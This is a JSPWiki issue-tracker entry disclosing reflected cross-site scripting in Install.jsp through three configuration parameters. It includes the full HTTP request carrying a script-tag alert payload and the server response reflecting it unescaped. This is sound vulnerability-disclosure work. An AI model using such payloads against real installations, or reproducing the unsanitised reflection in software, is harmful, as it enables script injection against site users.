  1. JSPWiki
  2. JSPWIKI-1138

Install.jsp UI overhaul


Details

    • Task
    • Status: Resolved
    • Major
    • Resolution: Duplicate
    • 2.11.0-M8
    • None
    • Core & storage
    • Windows new version

      Firefox version 84.0.1

       

    Description

      In the function install.jsp, multiple XSS exist in the parameters jspwiki.applicationName, jspwiki.fileSystemProvider.pageDir, jspwiki.workDir. The parameters are not sanitized via the method getContentEncoding().

      • Request :
        POST /wiki_jsp_war/Install.jsp HTTP/1.1
        Host: localhost:8080
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 248
        Origin: http://localhost:8080
        Connection: close
        Referer: http://localhost:8080/wiki_jsp_war/Install.jsp
        Cookie: JSESSIONID=079AB09DC4350BB216A468B15DC9F8BA; XDEBUG_SESSION=XDEBUG_ECLIPSE
        Upgrade-Insecure-Requests: 1

        jspwiki.applicationName=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.fileSystemProvider.pageDir=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.workDir=F%3A%5C%5CExtension%5C%5Capache-tomcat-8.5.60%5C%5Ctemp&submit=Configure%21
        
      • Response:
        HTTP/1.1 200
        Pragma: no-cache
        Expires: -1
        Cache-Control: no-cache
        Content-Type: text/html;charset=UTF-8
        Content-Language: en-US
        Date: Wed, 23 Dec 2020 10:33:46 GMT
        Connection: close
        Content-Length: 4403

        <?xml version="1.0" encoding="UTF-8"?>
        ...
        </div><div class="formcontainer"><form action="Install.jsp" method="post">  <!-- Page directory -->
          <h3>Basics</h3>    <label class="control-label" >Application Name<input class="form-control" type="text" name="jspwiki.applicationName" size="20" value="'"><script>alert(1)</script>"/>
            </label>
            <div class="help-block">
              What should your wiki be called?  Try to use a relative short name.</div>    <label class="control-label" >Page storage<input class="form-control" type="text" name="jspwiki.fileSystemProvider.pageDir" size="40" value="'"><script>alert(1)</script>"/>
            </label>
            <div class="help-block">
              By default, JSPWiki will use the VersioningFileProvider that stores files in a directory. If you specify a directory that does not exist, JSPWiki will try to create it for you. All attachments will also be put in the same directory.</div>
          <h3>Security</h3>    <label class="control-label" >Administrator account</label>
              <p>Enabled</p>
              <div class="description">
                This wiki has an administrator account named <strong>admin</strong> that is part of the wiki group <strong>Admin</strong>. By default, JSPWiki's security policy grants all members of the Admin group the all-powerful <code>AllPermission</code>.</div>
            <h3>Advanced Settings</h3>    <label class="control-label" >Work directory<input class="form-control" type="text" name="jspwiki.workDir" size="40" value="F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp"/>
            </label>
            <div class="help-block">
              This is the place where all caches and other runtime stuff is stored.</div>
            <p class="help-block">
              After you click <em>Configure!</em>, the installer will write your settings to <code>F:\Extension\apache-tomcat-8.5.60\temp\jspwiki-custom.properties</code>. It will also create an Administrator account with a random password and a corresponding Admin group.</p>
            <input class="btn btn-primary" type="submit" name="submit" value="Configure!" /></form></div><hr />
            <h3>Here is your new jspwiki-custom.properties</h3>
               <pre>jspwiki.applicationName = '"><script>alert(1)</script>
        jspwiki.fileSystemProvider.pageDir = '"><script>alert(1)</script>
        jspwiki.workDir = F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp
        jspwiki.basicAttachmentProvider.storageDir = '"><script>alert(1)</script>
        jspwiki.pageProvider = VersioningFileProvider
        </pre>
           <!-- We're done... -->
        </div>
        </div>
        </div>
        </body>
        </html>
        
        

          People

            Assignee: Unassigned
            Reporter: Nguyen Dang Khai (dangkhai)